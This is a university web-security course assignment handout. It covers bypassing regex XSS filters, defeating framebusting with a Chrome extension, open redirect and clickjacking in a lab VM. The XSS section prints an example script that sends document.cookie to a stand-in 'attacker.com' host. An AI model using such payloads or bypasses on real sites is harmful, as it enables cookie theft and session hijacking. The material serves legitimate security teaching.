
CS6262 Project 2 Solved


All work needs to be done inside the VM.

1.    Part 1 

a.    Understand well known vulnerabilities such as cross-site scripting (XSS) and bypass regex detectors with your own XSS. 

b.    Understand and implement framebusting using the same extension to prevent malicious web page forgery and framing via iframes.

2.    Part 2 (50 Points)

a.    Exploit a vulnerable website utilizing Open Redirect. (10 Points)

b.    Exploit a vulnerable website called GTShop by utilizing clickjacking. (40 Points)

Due Date
Please refer to the Canvas assignment. The autograder for Part 1 will close 1 week before Part 2, to ensure you have enough time to complete Part 2, so start early if you want to leverage the autograder!

Useful Suggestions 
Special thanks to Joves Luo for compiling this list of helpful tips. Refer to them as you proceed through the project.

General
•      Use the console or developer tools to view JavaScript errors.

•      Use console.log("message") or alert("message") to debug.

•      Most errors you encounter are likely very common, and specific error messages can most likely be resolved by Googling them.

•      View the web page's source code. Pay attention to hidden inputs. "Security by obscurity is a hacker's best friend."

Part 1.1: XSS
•      There are 3 regex patterns that you have to bypass. You will have to come up with 3 different whole script XSS attacks.

•      HTML has some very interesting syntax rules so you should refresh yourselves on what constitutes valid HTML.  

•      The following link may be useful in crafting your attacks.

https://www.w3schools.com/Tags/tag_script.asp 

•      Remember: you can make your attacks as crazy looking as you want them to be. As long as your attacks are composed of valid html and script, you can pass the regex and get the points.

•      Try to make a small change first. An extra character in certain places can completely bypass some regex detectors.

 

This part foreshadows later parts of the project. You learn how to bypass XSS filters. What is XSS and why is it blocked? What can it do if left unchecked? Keep these questions in mind.

 

Part 1.2: Framebusting
•      The script inside the frame contains DEFENSIVE code. It prevents index.html from holding the iframe. Your job is to prevent the script from running.

•      You may find a way to run code before the script in the iframe runs, then block, replace or remove it in some way.

•      Content Scripts allow you to run your JavaScript inside a website you are visiting via an Extension. They have some caveats, but they are a possible approach to the problem.

•      Background scripts enable you to INTERCEPT and MODIFY HTTP requests. They also have some caveats, but they are a feasible solution to the problem.

•      This paper provides useful information on framebusting.

 

Part 2.1: Open Redirect
•      This is NOT a coding exercise. You compose a URL that redirects a user to the GT admission page when s/he logs in.

•      You can learn the rudiments of URLs in this link.

•      Write a URL that results in the redirect. Copy and paste it into redirect.txt.  No code required.

 

Part 2.2: Clickjacking
1.    Get an iframe to run code it shouldn't. Think back to Part 1: how did we get a victim to run unintended code? For the web, what vulnerability makes this happen? Recall your experience from CS6035, Intro to Information Security.

2.    Get information about the iframe.  How can we get data from another domain?  Review related lectures.

3.    How do we pass data back and forth?  Take what you figured out in step 2, mirror it to get two way communication.

4.    With the data, what does the parent window need to do with the info?

5.    The buy action is subject to SOP.  How do you get around it?

6.    Once you figure out how to get around the SOP, what needs to be executed to buy something?

a.    When you buy something, you need a correct ID only. Don't worry about product names, addresses, emails, etc.

b.    If you get a success response but nothing is actually purchased, that is because the server code swallows exceptions.

c.     You need only one iframe.

d.    You don’t need to bother with the tester leaving the search results page.

e.    Each query will be with a fresh search from your page.

 

You will submit 5 files to Canvas for grading.

For the Part 1 tasks, you can zip only these 3 files and upload them to Gradescope to test your solution, but please submit all 5 files to Canvas before the whole project is due.

Part 1

•      manifest.json 

•      xss_attacks.txt 

•      frame_buster.js 

Part 2

•      redirect.txt 

•      clickjack.html 

Project Setup 
Virtual Machine (CS6262 P2 Spring 2021.ova)
 

All tasks need to be done inside the VM. 

 

Download a VM via the following link:

 

•      Mirror #1: Link to OVA on Google Drive

•      Mirror #2: Link to OVA on OneDrive

 

md5: 85d82922198afa2c03255dcda634774b 

 

Import the OVA file into the latest version of VirtualBox. The VM may take a while to boot.

  

The credentials are:

 

•    Username: user

•    Password: user

If you find the VM booting quite slowly, please do the following check after it first boots up. Run "sudo blkid" and copy the UUID of the line which contains TYPE="swap".

  

Then, run "sudo vim /etc/fstab" and update the UUID entry of the "swap" line.

  

After updating it, input ":wq" to save and exit. Now you can reboot the VM. It should boot much faster.

  

We do NOT recommend updating any existing packages via package managers (e.g., apt-get) or via the system's update dialog (screenshot not included).

 

In the case where you accidentally update packages and experience any malfunction, you may want to repeat the VM install with a fresh copy. Although there is no restriction for you to install any necessary packages (e.g., your favorite editors), you should do that at your own risk.

 

Part 1 XSS and Framebuster files (part1.zip)
Download and unzip Part 1 skeleton files:

•     Mirror #1: https://drive.google.com/open?id=1L7KqG3Yr2N9Q159zgVL6VgVAQEWQ5x7s

•     Mirror #2: https://drive.google.com/file/d/121Re9RL4XTbNZ5lT-F3skL7qn_i-0kOU

md5: 815ad2933f951c13516caabb3ec0315b

 

Your part 1 should have the following files: (screenshot of the file listing not included)

Your demo-color-changer-chrome-extension folder should have: (screenshot of the file listing not included)

Part 2 Open Redirect and Clickjacking Files (part2.zip)
Download and unzip Part 2 skeleton files:

•      Mirror #1: https://drive.google.com/file/d/1EiLjDcSVN2TQe2R97zcx-QK2bxEvoD_O

•      Mirror #2: https://drive.google.com/file/d/1cSocsrSyyJH3bYGUnpw82Yr6KuGDqask/

md5: ae9f8b51b9806359fae14cd8c73259a4

Project Tasks (100 points):

Part 1: XSS and Framebusting (50 points)

Part 1.1: XSS Attack - (30 points)
 

Overview
This part aims to help you understand how you can spoof regex detectors with a maliciously crafted text string. Although it may seem a tempting solution, detecting XSS attacks with regex is a bad idea in practice. We want you to experience this by conducting XSS attacks with your own scripts and bypassing the vulnerable XSS defender. To this end, we have set up a server which is accessible inside the VM ONLY:

 

http://cs6262.gtisc.gatech.edu/ 

 

By copying this URL into the browser inside the VM, you will see two links for the two tasks in Part 1.

The XSS link will bring you to a website containing 3 input fields. Each input will be examined by one of three different regex patterns. Your job is to compose 3 different XSS attacks which are able to bypass those 3 regex patterns. Be careful that your attacks must be EXECUTABLE HTML code in web browsers. You can copy your code into the HTML panel on https://jsfiddle.net/ and run it to see if it executes.

 

IMPORTANT:

1. YOUR CODE MUST BE EXECUTABLE FOR FULL CREDIT. IF YOUR CODE PASSES OUR REGEX FILTER BUT DOES NOT EXECUTE, YOU WILL NOT RECEIVE FULL CREDIT. (You will receive partial credit if your XSS passes the filter but DOES NOT execute. However, you won't receive any credit in the other case, i.e., executable but failed to pass the filter.)

2. FOR GRADING PURPOSES, YOU MUST INSERT ALERT IN YOUR XSS ATTACK PAYLOAD.

 

Alert is a built-in JavaScript function for a pop-up message. You can use it as follows:

<script>alert("wazzzzaaaup");</script>

 

You are responsible for ensuring your XSS attacks are valid HTML so that the alert is properly interpreted and run by the web browser. Getting the SUCCESS response means your XSS attack bypassed our regex filter, but it does NOT necessarily imply that your script is executable. Again, place your XSS attack in an HTML page (or jsfiddle) and run it to ensure an alert is generated (meaning it executes).

 

On a successful attack, the web page returns results like the following. The two images (not included) show the success and fail results respectively.

Resources
Tutorial Document 

The following document gives you an in-depth introduction to XSS: https://docs.google.com/document/d/1F7_axXzKVdqegWQDX6HmlwNchhsaLchWieOagWVzghE

 

Additional Resources 

You can learn the foundations of XSS and RegEx at the following links:

About XSS:

https://en.wikipedia.org/wiki/Cross-site_scripting

https://gbhackers.com/xss-cross-site-scripting/

About REGEX:

https://en.wikipedia.org/wiki/Regular_expression

https://www.computerhope.com/jargon/r/regex.htm

The sample_xss_attacks.txt file shows some XSS samples.

Whole Script XSS 

A whole script attack consists of opening and closing script tags with JavaScript statements embedded in between. Attackers inject the malicious code into the victim's page in order to exfiltrate data past the browser's sandbox (e.g., the Same Origin Policy). For example,

 

<script>
document.location = "http://attacker.com/saveCookie.php?cookie=" + document.cookie;
</script>

 

For more details, please read this paper:

Protection, Usability and Improvements in Reflected XSS Filters 

Part 1.2: Browser Extension Framebuster - (20 points)
Background: Frame Busting
An iframe is an HTML tag that embeds another HTML document in the current web page. The origin of the embedded HTML document can be different from that of the host web page the user is visiting.

 

Frame-busting is a technique that protects clients from clickjacking. It prevents web pages from being rendered inside a frame.

 

One method to block client-side clickjacking is to place the following JavaScript snippet in each web page:

 

<script>
if (top != self) top.location.href = location.href;
</script>
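The snippet above only protects the page if it actually runs; if it is suppressed or removed before execution, the framed copy renders normally. As an added example (not part of the course's sample site), the defence recommended in the framebusting literature inverts that default: the document is hidden by CSS until the check confirms it is the top-level window, so a suppressed script leaves a blank frame instead of a pixel-perfect clone:

```html
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>Default-deny frame buster (added example)</title>
  <!-- Added example, not the course's frame-busting-page.html.
       The style rule hides the whole document before any script runs,
       so the page is only ever shown if the check below executes and
       confirms that this window is the top-level window. -->
  <style>
    html { display: none; }
  </style>
  <script>
    // Strict comparison: self and top are the same object only when
    // the document is not embedded in any frame.
    if (self === top) {
      // Not framed: reveal the page.
      document.documentElement.style.display = 'block';
    } else {
      // Framed: navigate the top-level window to this page instead.
      // If this branch never runs, the document simply stays hidden.
      top.location = self.location;
    }
  </script>
</head>
<body>
  <p>Content that must never be rendered inside a third-party frame.</p>
</body>
</html>
```

Script-based busting is a fallback; the X-Frame-Options and Content-Security-Policy frame-ancestors response headers are the server-side controls that do not depend on script execution.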

 

Overview
You will create a Google Chrome Extension to:

•     Bypass the frame busting technique used in the sample website

 

Sample Website with Frame Buster
http://cs6262.gtisc.gatech.edu/framebusting/

 

You can only access this site inside the VM. 

 

•      Under the frame directory, there are two pages: frame-busting-page.html and index.html.

•      Your extension (which contains frame_buster.js) should bypass the frame busting technique and frame the frame-busting-page.html page into the iframe of index.html (under the frame directory).

Example of Successful Frame Buster Buster (screenshot not included)

Resources
Quick Start 

You can find the Chrome extension quickstart guide in Canvas - Files - Guides and Tutorials. This will be helpful if you don't have experience with Chrome Extensions.

 

Chrome Extension 

If you are unfamiliar with browser extension development, check out the demo extension in the demo-color-changer-chrome-extension folder.

 

The most important component of a Chrome browser extension is the manifest.json file. It looks like:

{
  "name": "CS6262 Extension",
  "description": "A simple extension",
  "version": "1.0",
  "permissions": [
    "tabs",
    "notifications"
  ],
  "background": {
    "scripts": ["frame_buster.js"],
    "persistent": false
  },
  "browser_action": {
    "default_title": "Does something",
    "default_icon": "icon.png"
  },
  "manifest_version": 2
}

 

The JSON file shows various keys like browser_action, permissions, and background. You use them to complete this part of the project. For further information about the typical Chrome extension structure, refer to this link:

https://developer.chrome.com/extensions/getstarted

 

Note: The manifest.json file should only reference your frame_buster.js file. If you leave references to other files like icon.png, your manifest.json will error out and you will not receive points.

 

For further reading, refer to https://developer.chrome.com/extensions/webRequest

 

Part 1 Grading 
 

Part 1.1 XSS Requirements
•      You may not use the same XSS attack on multiple inputs. Each attack must be unique! Each pair of similar attacks will result in a 2-point penalty.

•      Hard coded ‘Success’ is prohibited and will result in a 0.

•      Your three answers should be placed on three separate lines in xss_attacks.txt

•      No external libraries are allowed.

•      Code must be executable.

 

Part 1.2 Frame Busting Requirements
•      Do not use the iframe "sandbox" attribute of the browser to bypass the frame buster. Doing so will result in zero credit.

•      Your extension must not pop up any kind of alert that requires user interaction.

•      You may use automatic notifications but no JavaScript alerts.

•      Pop-ups that require user interaction will result in zero credit.

•      Please make sure the page can be loaded within 3 seconds, otherwise it will result in zero credit.

•      Do NOT hardcode any URLs in your source code. Your extension should work for ANY website if the same vulnerability is present. Otherwise, a 10 point penalty will be applied to your project grade.

•      Your extension must work for the original Google Chrome in the given VM. We will not grade your extension outside the VM nor with other versions of Google Chrome in any different environment.

•      Your extension must not modify the appearance of the framed page. It should look exactly the same, pixel-by-pixel. Otherwise, a 10 point penalty will be applied to your project grade.

•      Remove all references to files other than frame_buster.js from your manifest.json. You should not reference any other file like icon.png etc. Referencing files other than frame_buster.js may result in a 0 for this portion.  

•      No external libraries are allowed.

Deliverables
•      manifest.json 

•      xss_attacks.txt 

•      frame_buster.js 

 

Autograder
Gradescope has an autograder set up to test your submissions. For the XSS task, it has the same XSS filters as those used by the XSS website. For the framebusting task, it primarily tests the functionality of your extension, which is to prevent the page from navigating to frame-busting-page.html.
